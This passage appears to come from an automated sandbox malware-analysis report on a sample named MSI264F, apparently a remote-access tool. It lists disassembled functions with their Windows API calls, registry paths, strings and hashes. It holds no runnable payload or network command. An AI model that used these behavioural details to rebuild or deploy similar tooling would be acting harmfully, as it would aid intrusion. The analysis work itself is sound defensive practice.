                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove_wcspbrk
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$nsPrefix.IsA()$nsSuffix.IsA()$pszDelims!=0
                                                                                                                        • API String ID: 3207938814-3906421881
                                                                                                                        • Opcode ID: e5042e832a436b6a22b4008e6045f74db159d7f5d6d78aff9b93c1993235a4f0
                                                                                                                        • Instruction ID: 86fe0d03fc47f2d39a9c2d1dd94503d6e1ff39156f5ae2ccd2fbc116dbc70adc
                                                                                                                        • Opcode Fuzzy Hash: e5042e832a436b6a22b4008e6045f74db159d7f5d6d78aff9b93c1993235a4f0
                                                                                                                        • Instruction Fuzzy Hash: 35512A357A07026BDE10BF18DC6BE1937D9AFE5B04F1041D4F6016B3D2CA76AE0986D1
                                                                                                                        Function 00AEAB90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Close
                                                                                                                        • String ID: %s.Services
                                                                                                                        • API String ID: 2117561858-610773381
                                                                                                                        • Opcode ID: cb81f712d9195ac1c9f9d5c8109412d11e84fd98735ed60dd1dce4a4f7369f58
                                                                                                                        • Instruction ID: c75349ac3c6e1999f843e821370ae003f5199a64ee1fd922c39d1279d528c7a9
                                                                                                                        • Opcode Fuzzy Hash: cb81f712d9195ac1c9f9d5c8109412d11e84fd98735ed60dd1dce4a4f7369f58
                                                                                                                        • Instruction Fuzzy Hash: B051A0B1B00204AFDB14EBA4EC95FBA77B9EB98301F104549F90AC7290DE749D40CB92
                                                                                                                        Function 00B22E70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 00B22E94
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 00B22FB6
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000001), ref: 00B22FE0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMove$DirectorySystem
                                                                                                                        • String ID: .dll$.old$.org
                                                                                                                        • API String ID: 2645207662-1297993771
                                                                                                                        • Opcode ID: 26fbe43747738f0b8692e2a4015368231ddd962bf5783ca9d9102f0f769b9a63
                                                                                                                        • Instruction ID: ca6c26fd2dc57ef708b18f3082870b23755525b3ca5f44280ead79f240e5e411
                                                                                                                        • Opcode Fuzzy Hash: 26fbe43747738f0b8692e2a4015368231ddd962bf5783ca9d9102f0f769b9a63
                                                                                                                        • Instruction Fuzzy Hash: 3551D07590021A8BCB20EF6CD955BA6B3F9EF88340F058594EE0ADB765E7709E41CB90
                                                                                                                        Function 00B06920 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B06972
                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,00000104), ref: 00B069F8
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000), ref: 00B069FF
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00B06A32
                                                                                                                        • __wsplitpath.LIBCMT ref: 00B06A52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$HandleSave__wsplitpath_memset
                                                                                                                        • String ID: BMP$X
                                                                                                                        • API String ID: 3358655634-1972070916
                                                                                                                        • Opcode ID: b6c98cb1020e5b6e5760d4eeed2752eaf7b3c39d701c3d07562354535020eab4
                                                                                                                        • Instruction ID: a3cd9e33bd6b24c51b60b80ec9637f08a10e3055ce9b9ee623742bc8210c3229
                                                                                                                        • Opcode Fuzzy Hash: b6c98cb1020e5b6e5760d4eeed2752eaf7b3c39d701c3d07562354535020eab4
                                                                                                                        • Instruction Fuzzy Hash: 2441C571A002189BDB20AF648C56BEB77F9EF84710F0481D9E909A7281EB759E64CB51
                                                                                                                        Function 00AF2D60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2D8D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2DB0
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00AF2E34
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF2E42
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2E55
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 00AF2E6F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 2427920155-3145022300
                                                                                                                        • Opcode ID: b6ede2332fbef912da445ce5dc6d5277eed8ca296b8eac582beb64b70f2339e0
                                                                                                                        • Instruction ID: 41144f82ac3201fde53337079ba3410636474f4e60a8f305b2d137cf3255e6ec
                                                                                                                        • Opcode Fuzzy Hash: b6ede2332fbef912da445ce5dc6d5277eed8ca296b8eac582beb64b70f2339e0
                                                                                                                        • Instruction Fuzzy Hash: 2231B1719002089FCB14EF98D891FBE7BB4FB04720F244669F922A72A1DB74AD45CBD1
                                                                                                                        Function 00B22BC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,0002001F,?), ref: 00B22BD9
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 00B22C31
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22C50
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices, xrefs: 00B22BCF, 00B22BE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseLoadOpenStringValuewvsprintf
                                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices
                                                                                                                        • API String ID: 1103474554-242128824
                                                                                                                        • Opcode ID: c038436acc3e8ca9de3eaa4c64cd068af4913c22835090a06acbd8193b5d03c6
                                                                                                                        • Instruction ID: acbfba83f6990f6f85b5a48135f0d3e65a4e6b59891f58a19d3f9efbbf802447
                                                                                                                        • Opcode Fuzzy Hash: c038436acc3e8ca9de3eaa4c64cd068af4913c22835090a06acbd8193b5d03c6
                                                                                                                        • Instruction Fuzzy Hash: E2219476A50124BBD7209BA8AC0AFBB77ECEF44B50F044195FD0CE7291D9B19D1097D0
                                                                                                                        Function 00B26980 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,5E06C67B), ref: 00B269CC
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,CurrentBuildNumber,00000000,?,?,?), ref: 00B26A0C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B26AB0
                                                                                                                          • Part of subcall function 00B38406: __fassign.LIBCMT ref: 00B383E3
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,ProductName,00000000,?,?,00000200), ref: 00B26A58
                                                                                                                          • Part of subcall function 00B01CE0: __wcsdup.LIBCMT ref: 00B01CFA
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00B269BC
                                                                                                                        • ProductName, xrefs: 00B26A48
                                                                                                                        • CurrentBuildNumber, xrefs: 00B269FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen__fassign__wcsdup
                                                                                                                        • String ID: CurrentBuildNumber$ProductName$Software\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 1922745187-1939540524
                                                                                                                        • Opcode ID: 4b29199e7d9aaf6807b6873864e3dee4edb6f450da9aa1d06e9484c42a28d5fa
                                                                                                                        • Instruction ID: e560dd56af2e9ebedf8ffa0589c0ca1fe4104638e509bd4797b57d965e346556
                                                                                                                        • Opcode Fuzzy Hash: 4b29199e7d9aaf6807b6873864e3dee4edb6f450da9aa1d06e9484c42a28d5fa
                                                                                                                        • Instruction Fuzzy Hash: 8E31907194022DAADB24DF94DC89FEAB7B8FB18304F1045D9E51DA7290EB705E488F60
                                                                                                                        Function 00B02060 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                                        • API String ID: 4104443479-2764870142
                                                                                                                        • Opcode ID: 4d23fc3b9e02f1d3de087e710f7822e4c4eb8367d98e983c9c849ddf30bcaa77
                                                                                                                        • Instruction ID: abe703c7cdf601ff70ef55096fd8f69bb71e4730a8977e28a24f2675a4db0e3d
                                                                                                                        • Opcode Fuzzy Hash: 4d23fc3b9e02f1d3de087e710f7822e4c4eb8367d98e983c9c849ddf30bcaa77
                                                                                                                        • Instruction Fuzzy Hash: 91213B367503066BDE20BF48DC8BD5A77D8EFA4B04F1080D8F909672D2EBB1A909C6D1
                                                                                                                        Function 00AFC2C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Find$ClassNameSleep__wcsicoll
                                                                                                                        • String ID: gfff
                                                                                                                        • API String ID: 3191320014-1553575800
                                                                                                                        • Opcode ID: 629a068476979f5a7cc15c38a60ff7dba7846f24b26dc027e6a4c276090a85c6
                                                                                                                        • Instruction ID: 77b726f65ce362490b8d14c2c92327bc6b61e103cd306f78b479a99cf58525b5
                                                                                                                        • Opcode Fuzzy Hash: 629a068476979f5a7cc15c38a60ff7dba7846f24b26dc027e6a4c276090a85c6
                                                                                                                        • Instruction Fuzzy Hash: 8E212872A0022D6BDB208FA6DD44BAEB3A8BF443A0F048154FA09DB340DF75ED418BD1
                                                                                                                        Function 00B126E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B12700
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00B12739
                                                                                                                        • GetSysColor.USER32(00000014), ref: 00B12750
                                                                                                                        • GetDC.USER32(00000000), ref: 00B12789
                                                                                                                        • CreateDIBitmap.GDI32(00000000,00000028,00000004,?,00000028,00000000), ref: 00B127A4
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B127AF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BitmapCreateRelease_memset
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2435261946-3887548279
                                                                                                                        • Opcode ID: fdbec91dc5eaa60b4412fe58401e5d7df79f9319c8162ef1b8ad3c804b628ac6
                                                                                                                        • Instruction ID: 94f32784fe083e5156fc9932383723e269f66b44c2c34407ccaeded17f83ab67
                                                                                                                        • Opcode Fuzzy Hash: fdbec91dc5eaa60b4412fe58401e5d7df79f9319c8162ef1b8ad3c804b628ac6
                                                                                                                        • Instruction Fuzzy Hash: D2217E71E013589FDB10DBA89C05BDEBBF5AB98300F1040ADE549EB381DEB55A04CFA5
                                                                                                                        Function 00B131C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProfileStringW.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 00B131EE
                                                                                                                        • _wcschr.LIBCMT ref: 00B131FD
                                                                                                                        • _wcschr.LIBCMT ref: 00B13218
                                                                                                                        • _memmove.LIBCMT ref: 00B13246
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$ProfileString_memmove
                                                                                                                        • String ID: ,,LPT1:$Device$Windows
                                                                                                                        • API String ID: 1955083591-2967085602
                                                                                                                        • Opcode ID: ff57a1330ba5b32c67a026db170f9d8a585fce44e12c6c77270842ab7c1c20b3
                                                                                                                        • Instruction ID: 0edbbcd2b94d417fde9860d5561bafd81982e1b9e470ee048c15d2691d943715
                                                                                                                        • Opcode Fuzzy Hash: ff57a1330ba5b32c67a026db170f9d8a585fce44e12c6c77270842ab7c1c20b3
                                                                                                                        • Instruction Fuzzy Hash: FE1157B5A00201A7DB10AB60DC42BFB73E8EF64B00F1400E8EC0597291FEB1AB45C7E1
                                                                                                                        Function 00B00AA9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66timewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B00B0C
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00B00120), ref: 00B00B28
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00000000), ref: 00B00B42
                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 00B00B4B
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000012,00000012,00000001), ref: 00B00B60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimer$KillPeekwsprintf
                                                                                                                        • String ID: NOT copied to disk$copied to %s
                                                                                                                        • API String ID: 2782773723-785013881
                                                                                                                        • Opcode ID: d7a231aef89a61af78637f1915754ba92e011d976372e97283547a55784e4586
                                                                                                                        • Instruction ID: bd50a74149896ef7c0daf4fd8f646b77cd2f397ea942ed20c8f89af5f878201b
                                                                                                                        • Opcode Fuzzy Hash: d7a231aef89a61af78637f1915754ba92e011d976372e97283547a55784e4586
                                                                                                                        • Instruction Fuzzy Hash: AD11D332A443049BDB20ABA0DD56FEA37B8EB64701F4401D9FE0A971C1EBB55904CB51
                                                                                                                        Function 00B16AF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 00B16B03
                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00B16B1D
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B16B3A
                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 00B16B4B
                                                                                                                        • LoadImageW.USER32(?,?,00000001,00000000,00000000,00000000), ref: 00B16B5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$AddressFreeImageMetricsProcSystem
                                                                                                                        • String ID: LoadIconMetric$comctl32.dll
                                                                                                                        • API String ID: 3523791368-3710313162
                                                                                                                        • Opcode ID: a3d3805414dd70e7f2aab5cce15547e475103a8e13f2f181556299766c99ebdf
                                                                                                                        • Instruction ID: c9b29a2ef1197736e2ea70f350903ccf6eaa101f315b1d15acf26684f43ce5b0
                                                                                                                        • Opcode Fuzzy Hash: a3d3805414dd70e7f2aab5cce15547e475103a8e13f2f181556299766c99ebdf
                                                                                                                        • Instruction Fuzzy Hash: D6019E72704218BBD720AF55EC49FAF77ACDB85B61F004099F90DD32C0DAB69D4086A4
                                                                                                                        Function 00AFE540 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AFE55C
                                                                                                                        • GetModuleHandleW.KERNEL32(USER32), ref: 00AFE570
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00AFE57C
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AFE596
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc__wcsicoll_memset
                                                                                                                        • String ID: GetMonitorInfoW$USER32$h
                                                                                                                        • API String ID: 1219090488-2164005547
                                                                                                                        • Opcode ID: a4d1104b9d2c37e82226c33ef9dbc6e9cff17487b433d657eabee38cb442f00e
